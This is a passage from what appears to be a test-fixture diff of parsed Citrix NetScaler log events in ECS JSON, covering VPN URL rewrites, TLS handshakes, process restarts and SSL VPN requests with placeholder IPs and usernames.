0-PPE-0 : CVPN CVPN_REWRITTEN_URL 4471 0 : REWRITTEN_URL https://example.com/proxy?url=page", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "example.com", + "original": "https://example.com/proxy?url=page", + "path": "/proxy", + "query": "url=page", + "scheme": "https" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CVPN CVPN_MATCHED_URL 4471 0 : MATCHED_URL https://example.com/assets/image.jpg", + "device_event_class_id": "CVPN", + "extended": { + "message": "MATCHED_URL https://example.com/assets/image.jpg" + }, + "facility": "local0", + "host": "ns1", + "name": "CVPN_MATCHED_URL", + "priority": "info" + }, + "citrix_adc": { + "log": { + "matched_url": "https://example.com/assets/image.jpg", + "message": "MATCHED_URL https://example.com/assets/image.jpg" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CVPN CVPN_MATCHED_URL 4471 0 : MATCHED_URL https://example.com/assets/image.jpg", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "example.com", + "extension": "jpg", + "original": "https://example.com/assets/image.jpg", + "path": "/assets/image.jpg", + "scheme": "https" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TRANSFORM ACTION_MISMATCH 4471 0 : Client 1.128.0.0 - Profile ThreatPrevention - Action Alert - Value High", + "device_event_class_id": "TRANSFORM", + "extended": { + "message": "Client 1.128.0.0 - Profile ThreatPrevention - Action Alert - Value High" + }, + "facility": "local0", + "host": "ns1", + "name": "ACTION_MISMATCH", + "priority": "info" + }, + "citrix_adc": { + "log": { + "action": "Alert", + "client_ip": "1.128.0.0", + "message": "Client 1.128.0.0 - Profile ThreatPrevention - Action Alert - Value High", + "profile": "ThreatPrevention", + "value": "High" + } + }, + "client": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "alert", + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TRANSFORM ACTION_MISMATCH 4471 0 : Client 1.128.0.0 - Profile ThreatPrevention - Action Alert - Value High", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TRANSFORM PCRE_ERROR 4471 0 : Client 1.128.0.0 - Profile ContentFilter - Action Validate - PCRE error code 5", + "device_event_class_id": "TRANSFORM", + "extended": { + "message": "Client 1.128.0.0 - Profile ContentFilter - Action Validate - PCRE error code 5" + }, + "facility": "local0", + "host": "ns1", + "name": "PCRE_ERROR", + "priority": "info" + }, + "citrix_adc": { + "log": { + "action": "Validate", + "client_ip": "1.128.0.0", + "message": "Client 1.128.0.0 - Profile ContentFilter - Action Validate - PCRE error code 5", + "pcre_error_code": "5", + "profile": "ContentFilter" + } + }, + "client": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "validate", + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TRANSFORM PCRE_ERROR 4471 0 : Client 1.128.0.0 - Profile ContentFilter - Action Validate - PCRE error code 5", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TRANSFORM REQ_WRITE_ERROR 4471 0 : Client 1.128.0.0 - Profile Gateway - Failed to write Location request header", + "device_event_class_id": "TRANSFORM", + "extended": { + "message": "Client 1.128.0.0 - Profile Gateway - Failed to write Location request header" + }, + "facility": "local0", + "host": "ns1", + "name": "REQ_WRITE_ERROR", + "priority": "info" + }, + "citrix_adc": { + "log": { + "client_ip": "1.128.0.0", + "header": "Location", + "message": "Client 1.128.0.0 - Profile Gateway - Failed to write Location request header", + "profile": "Gateway" + } + }, + "client": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TRANSFORM REQ_WRITE_ERROR 4471 0 : Client 1.128.0.0 - Profile Gateway - Failed to write Location request header", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : BOT BOT_SIG_AUTO_UPDATE 4471 0 : Bot New Signature Available. Newly added Rules: 5 DeletedRules: 2", + "device_event_class_id": "BOT", + "extended": { + "message": "Bot New Signature Available. Newly added Rules: 5 DeletedRules: 2" + }, + "facility": "local0", + "host": "ns1", + "name": "BOT_SIG_AUTO_UPDATE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "deleted_rules": 2, + "message": "Bot New Signature Available. Newly added Rules: 5 DeletedRules: 2", + "newly_added_rules": 5 + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : BOT BOT_SIG_AUTO_UPDATE 4471 0 : Bot New Signature Available. Newly added Rules: 5 DeletedRules: 2", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : PITBOSS PITBOSS 4471 0 : Adding pitboss watch on (1024)", + "device_event_class_id": "PITBOSS", + "extended": { + "message": "Adding pitboss watch on (1024)" + }, + "facility": "local0", + "host": "ns1", + "name": "PITBOSS", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "Adding pitboss watch on (1024)", + "watch_id": "1024" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : PITBOSS PITBOSS 4471 0 : Adding pitboss watch on (1024)", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : PITBOSS PITBOSS 4471 0 : Deleting watch on (2048)", + "device_event_class_id": "PITBOSS", + "extended": { + "message": "Deleting watch on (2048)" + }, + "facility": "local0", + "host": "ns1", + "name": "PITBOSS", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "Deleting watch on (2048)", + "watch_id": "2048" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : PITBOSS PITBOSS 4471 0 : Deleting watch on (2048)", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : PITBOSS PB_SYSTEM_RESTART 4471 0 : proc (4096) (DatabaseService) has had its maximum number of restarts (3), rebooting the system", + "device_event_class_id": "PITBOSS", + "extended": { + "message": "proc (4096) (DatabaseService) has had its maximum number of restarts (3), rebooting the system" + }, + "facility": "local0", + "host": "ns1", + "name": "PB_SYSTEM_RESTART", + "priority": "info" + }, + "citrix_adc": { + "log": { + "max_restarts": 3, + "message": "proc (4096) (DatabaseService) has had its maximum number of restarts (3), rebooting the system", + "process": { + "id": 4096, + "name": "DatabaseService" + } + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : PITBOSS PB_SYSTEM_RESTART 4471 0 : proc (4096) (DatabaseService) has had its maximum number of restarts (3), rebooting the system", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "process": { + "name": "DatabaseService", + "pid": 4096 + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : PITBOSS PB_PROCESS_RESTART 4471 0 : Restarting process old pid (8192) action (respawn)", + "device_event_class_id": "PITBOSS", + "extended": { + "message": "Restarting process old pid (8192) action (respawn)" + }, + "facility": "local0", + "host": "ns1", + "name": "PB_PROCESS_RESTART", + "priority": "info" + }, + "citrix_adc": { + "log": { + "action": "respawn", + "message": "Restarting process old pid (8192) action (respawn)", + "old_pid": 8192 + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "respawn", + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : PITBOSS PB_PROCESS_RESTART 4471 0 : Restarting process old pid (8192) action (respawn)", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_SUCCESS 37819 0 : SPCBId 3376175 - ClientIP 1.128.0.1 - ClientPort 2357 - VserverServiceIP 1.128.0.2 - VserverServicePort 443 - ClientVersion TLSv1.3 - CipherSuite \"TLS1.3-AES256-GCM-SHA384\" - Session New - HandshakeTime 55 ms", + "device_event_class_id": "SSLLOG", + "extended": { + "message": "SPCBId 3376175 - ClientIP 1.128.0.1 - ClientPort 2357 - VserverServiceIP 1.128.0.2 - VserverServicePort 443 - ClientVersion TLSv1.3 - CipherSuite \"TLS1.3-AES256-GCM-SHA384\" - Session New - HandshakeTime 55 ms" + }, + "facility": "local0", + "host": "ns1", + "name": "SSL_HANDSHAKE_SUCCESS", + "priority": "info" + }, + "citrix_adc": { + "log": { + "cipher_suite": "TLS1.3-AES256-GCM-SHA384", + "client_ip": "1.128.0.1", + "client_port": 2357, + "client_version": "TLSv1.3", + "handshake_time": "55", + "message": "SPCBId 3376175 - ClientIP 1.128.0.1 - ClientPort 2357 - VserverServiceIP 1.128.0.2 - VserverServicePort 443 - ClientVersion TLSv1.3 - CipherSuite \"TLS1.3-AES256-GCM-SHA384\" - Session New - HandshakeTime 55 ms", + "session": "New", + "spcb_id": "3376175", + "vserver": { + "ip": "1.128.0.2", + "port": 443 + } + } + }, + "client": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.1", + "port": 2357 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "37819", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_SUCCESS 37819 0 : SPCBId 3376175 - ClientIP 1.128.0.1 - ClientPort 2357 - VserverServiceIP 1.128.0.2 - VserverServicePort 443 - ClientVersion TLSv1.3 - CipherSuite \"TLS1.3-AES256-GCM-SHA384\" - Session New - HandshakeTime 55 ms", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.2", + "1.128.0.1" + ] + }, + "server": { + "ip": "1.128.0.2", + "port": 443 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "tls": { + "cipher": "TLS1.3-AES256-GCM-SHA384", + "version": "1.3", + "version_protocol": "TLS" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_SUCCESS 37819 0 : Backend SPCBId 3376176 - ServerIP 10.10.41.205 - ServerPort 8443 - ProtocolVersion TLSv1.2 - CipherSuite \"TLS1.2-ECDHE-RSA-AES256-GCM-SHA384\" - Session New - SERVER_AUTHENTICATED -SerialNumber \"12CF1F64F01429F7\" - SignatureAlgorithm \"sha256WithRSAEncryption\" - ValidFrom \"Apr 20 07:46:28 2023 GMT\" - ValidTo \"May 1 20:22:03 2024 GMT\" - HandshakeTime 8 ms", + "device_event_class_id": "SSLLOG", + "extended": { + "message": "Backend SPCBId 3376176 - ServerIP 10.10.41.205 - ServerPort 8443 - ProtocolVersion TLSv1.2 - CipherSuite \"TLS1.2-ECDHE-RSA-AES256-GCM-SHA384\" - Session New - SERVER_AUTHENTICATED -SerialNumber \"12CF1F64F01429F7\" - SignatureAlgorithm \"sha256WithRSAEncryption\" - ValidFrom \"Apr 20 07:46:28 2023 GMT\" - ValidTo \"May 1 20:22:03 2024 GMT\" - HandshakeTime 8 ms" + }, + "facility": "local0", + "host": "ns1", + "name": "SSL_HANDSHAKE_SUCCESS", + "priority": "info" + }, + "citrix_adc": { + "log": { + "cipher_suite": "TLS1.2-ECDHE-RSA-AES256-GCM-SHA384", + "handshake_time": "8", + "message": "Backend SPCBId 3376176 - ServerIP 10.10.41.205 - ServerPort 8443 - ProtocolVersion TLSv1.2 - CipherSuite \"TLS1.2-ECDHE-RSA-AES256-GCM-SHA384\" - Session New - SERVER_AUTHENTICATED -SerialNumber \"12CF1F64F01429F7\" - SignatureAlgorithm \"sha256WithRSAEncryption\" - ValidFrom \"Apr 20 07:46:28 2023 GMT\" - ValidTo \"May 1 20:22:03 2024 GMT\" - HandshakeTime 8 ms", + "protocol_version": "TLSv1.2", + "serial_number": "12CF1F64F01429F7", + "server": { + "ip": "10.10.41.205", + "port": 8443 + }, + "server_authentication": "SERVER_AUTHENTICATED", + "session": "New", + "signature_algorithm": "sha256WithRSAEncryption", + "spcb_id": "3376176", + "valid_from": "2023-04-20T07:46:28.000Z", + "valid_to": "2024-05-01T20:22:03.000Z" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "37819", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_SUCCESS 37819 0 : Backend SPCBId 3376176 - ServerIP 10.10.41.205 - ServerPort 8443 - ProtocolVersion TLSv1.2 - CipherSuite \"TLS1.2-ECDHE-RSA-AES256-GCM-SHA384\" - Session New - SERVER_AUTHENTICATED -SerialNumber \"12CF1F64F01429F7\" - SignatureAlgorithm \"sha256WithRSAEncryption\" - ValidFrom \"Apr 20 07:46:28 2023 GMT\" - ValidTo \"May 1 20:22:03 2024 GMT\" - HandshakeTime 8 ms", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "10.10.41.205", + "81.2.69.144" + ] + }, + "source": { + "ip": "10.10.41.205", + "port": 8443 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "tls": { + "cipher": "TLS1.2-ECDHE-RSA-AES256-GCM-SHA384", + "version": "1.2", + "version_protocol": "TLS" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "default_class": true, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : default SSLLOG SSL_HANDSHAKE_ISSUERNAME 39207 0 : SPCBId 3376283 - IssuerName \" C=US,ST=Arizona,L=Scottsdale,O=GoDaddy.com, Inc.,OU=http://crts.godaddy.com/repository/,CN=Go Daddy Secure Certificate Authority - G2\"", + "device_event_class_id": "SSLLOG", + "extended": { + "message": "SPCBId 3376283 - IssuerName \" C=US,ST=Arizona,L=Scottsdale,O=GoDaddy.com, Inc.,OU=http://crts.godaddy.com/repository/,CN=Go Daddy Secure Certificate Authority - G2\"" + }, + "facility": "local0", + "host": "ns1", + "name": "SSL_HANDSHAKE_ISSUERNAME", + "priority": "info" + }, + "citrix_adc": { + "log": { + "issuer_name": " C=US,ST=Arizona,L=Scottsdale,O=GoDaddy.com, Inc.,OU=http://crts.godaddy.com/repository/,CN=Go Daddy Secure Certificate Authority - G2", + "message": "SPCBId 3376283 - IssuerName \" C=US,ST=Arizona,L=Scottsdale,O=GoDaddy.com, Inc.,OU=http://crts.godaddy.com/repository/,CN=Go Daddy Secure Certificate Authority - G2\"", + "spcb_id": "3376283" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "39207", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : default SSLLOG SSL_HANDSHAKE_ISSUERNAME 39207 0 : SPCBId 3376283 - IssuerName \" C=US,ST=Arizona,L=Scottsdale,O=GoDaddy.com, Inc.,OU=http://crts.godaddy.com/repository/,CN=Go Daddy Secure Certificate Authority - G2\"", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "tls": { + "server": { + "issuer": " C=US,ST=Arizona,L=Scottsdale,O=GoDaddy.com, Inc.,OU=http://crts.godaddy.com/repository/,CN=Go Daddy Secure Certificate Authority - G2" + } + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "default_class": true, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : default SSLLOG SSL_HANDSHAKE_FAILURE 31626 0 : SPCBId 2558141 - ClientIP 1.128.0.0 - ClientPort 54686 - VserverServiceIP 1.128.0.1 - VserverServicePort 443 - ClientVersion TLSv1.0 - CipherSuite \"NA\"Session New - Reason \"Wrong protocol version in the message\"", + "device_event_class_id": "SSLLOG", + "extended": { + "message": "SPCBId 2558141 - ClientIP 1.128.0.0 - ClientPort 54686 - VserverServiceIP 1.128.0.1 - VserverServicePort 443 - ClientVersion TLSv1.0 - CipherSuite \"NA\"Session New - Reason \"Wrong protocol version in the message\"" + }, + "facility": "local0", + "host": "ns1", + "name": "SSL_HANDSHAKE_FAILURE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "cipher_suite": "NA", + "client_ip": "1.128.0.0", + "client_port": 54686, + "client_version": "TLSv1.0", + "message": "SPCBId 2558141 - ClientIP 1.128.0.0 - ClientPort 54686 - VserverServiceIP 1.128.0.1 - VserverServicePort 443 - ClientVersion TLSv1.0 - CipherSuite \"NA\"Session New - Reason \"Wrong protocol version in the message\"", + "reason": "Wrong protocol version in the message", + "session": "New", + "spcb_id": "2558141", + "vserver": { + "ip": "1.128.0.1", + "port": 443 + } + } + }, + "client": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0", + "port": 54686 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "31626", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : default SSLLOG SSL_HANDSHAKE_FAILURE 31626 0 : SPCBId 2558141 - ClientIP 1.128.0.0 - ClientPort 54686 - VserverServiceIP 1.128.0.1 - VserverServicePort 443 - ClientVersion TLSv1.0 - CipherSuite \"NA\"Session New - Reason \"Wrong protocol version in the message\"", + "reason": "Wrong protocol version in the message", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.1", + "1.128.0.0" + ] + }, + "server": { + "ip": "1.128.0.1", + "port": 443 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "tls": { + "cipher": "NA", + "version": "1.0", + "version_protocol": "TLS" + } + }, + { + "@timestamp": "2015-06-22T19:14:37.000Z", + "citrix": { + "cef_format": false, + "detail": "06/22/2015:19:14:37 GMT ns 0-PPE-1 : SSLVPN HTTPREQUEST 4471 0 : Context someusername@1.128.0.0 - SessionId: 12690921 - example.domain.com User someusername : Group(s) N/A : Vserver 1.128.0.1:443 - 2022/06/14:16:07:48 : SSO is ON : GET /Citrix/Redacted/URL/Path - -", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "Context someusername@1.128.0.0 - SessionId: 12690921 - example.domain.com User someusername : Group(s) N/A : Vserver 1.128.0.1:443 - 2022/06/14:16:07:48 : SSO is ON : GET /Citrix/Redacted/URL/Path - -" + }, + "facility": "local0", + "host": "ns", + "name": "HTTPREQUEST", + "priority": "info" + }, + "citrix_adc": { + "log": { + "client_ip": "1.128.0.0", + "groups": "N/A", + "hostname": "example.domain.com", + "message": "Context someusername@1.128.0.0 - SessionId: 12690921 - example.domain.com User someusername : Group(s) N/A : Vserver 1.128.0.1:443 - 2022/06/14:16:07:48 : SSO is ON : GET /Citrix/Redacted/URL/Path - -", + "method": "GET", + "request": { + "path": "/Citrix/Redacted/URL/Path" + }, + "session_id": "12690921", + "sso_status": "ON", + "timestamp": "2022-06-14T16:07:48.000Z", + "user": "someusername", + "username": "someusername", + "vserver": { + "ip": "1.128.0.1", + "port": 443 + } + } + }, + "client": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "id": "4471", + "original": "Jun 22 19:14:37 81.2.69.144 06/22/2015:19:14:37 GMT ns 0-PPE-1 : SSLVPN HTTPREQUEST 4471 0 : Context someusername@1.128.0.0 - SessionId: 12690921 - example.domain.com User someusername : Group(s) N/A : Vserver 1.128.0.1:443 - 2022/06/14:16:07:48 : SSO is ON : GET /Citrix/Redacted/URL/Path - -", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "group": { + "name": "N/A" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.1", + "1.128.0.0" + ], + "user": [ + "someusername" + ] + }, + "server": { + "ip": "1.128.0.1", + "port": 443 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "example.domain.com" + }, + "user": { + "name": "someusername" + } + }, + { + "@timestamp": "2015-06-22T19:14:37.000Z", + "citrix": { + "cef_format": false, + "detail": "06/22/2015:19:14:37 GMT ns 0-PPE-1 : SSLVPN HTTPREQUEST 4471 0 : Context another.email@company.com@1.128.0.0- SessionId: 104248- some-domain.company.com User some.email@company.com : Group(s) N/A : Vserver 1.128.0.1:443 - 07/07/2022:11:22:00 GMT POST /Some/Url/Concealed - -", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "Context another.email@company.com@1.128.0.0- SessionId: 104248- some-domain.company.com User some.email@company.com : Group(s) N/A : Vserver 1.128.0.1:443 - 07/07/2022:11:22:00 GMT POST /Some/Url/Concealed - -" + }, + "facility": "local0", + "host": "ns", + "name": "HTTPREQUEST", + "priority": "info" + }, + "citrix_adc": { + "log": { + "client_ip": "1.128.0.0", + "groups": "N/A", + "hostname": "some-domain.company.com", + "message": "Context another.email@company.com@1.128.0.0- SessionId: 104248- some-domain.company.com User some.email@company.com : Group(s) N/A : Vserver 1.128.0.1:443 - 07/07/2022:11:22:00 GMT POST /Some/Url/Concealed - -", + "method": "POST", + "request": { + "path": "/Some/Url/Concealed" + }, + "session_id": "104248", + "timestamp": "2022-07-07T11:22:00.000Z", + "timezone": "GMT", + "user": "some.email@company.com", + "username": "another.email@company.com", + "vserver": { + "ip": "1.128.0.1", + "port": 443 + } + } + }, + "client": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "id": "4471", + "original": "Jun 22 19:14:37 81.2.69.144 06/22/2015:19:14:37 GMT ns 0-PPE-1 : SSLVPN HTTPREQUEST 4471 0 : Context another.email@company.com@1.128.0.0- SessionId: 104248- some-domain.company.com User some.email@company.com : Group(s) N/A : Vserver 1.128.0.1:443 - 07/07/2022:11:22:00 GMT POST /Some/Url/Concealed - -", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "group": { + "name": "N/A" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.1", + "1.128.0.0" + ], + "user": [ + "another.email@company.com" + ] + }, + "server": { + "ip": "1.128.0.1", + "port": 443 + }, + "tags": [ + "preserve_original_event", + 